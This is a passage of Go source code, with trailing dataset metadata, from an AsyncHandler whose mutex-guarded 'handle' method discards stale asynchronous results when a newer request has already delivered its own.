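//		results := search(query)          // slow work, runs in a goroutine via utils.Safe
//		return func() { render(results) } // dropped if a later request already delivered its result
//	})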
// f here is expected to be a function that doesn't take long to run
func (self *AsyncHandler) handle(f func(), id int) {
self.mutex.Lock()
defer self.mutex.Unlock()
if id < self.lastId {
if self.onReject != nil {
self.onReject()
}
return
}
self.lastId = id
f()
}
| []
| []
| []
| [] | [] | go | null | null | null |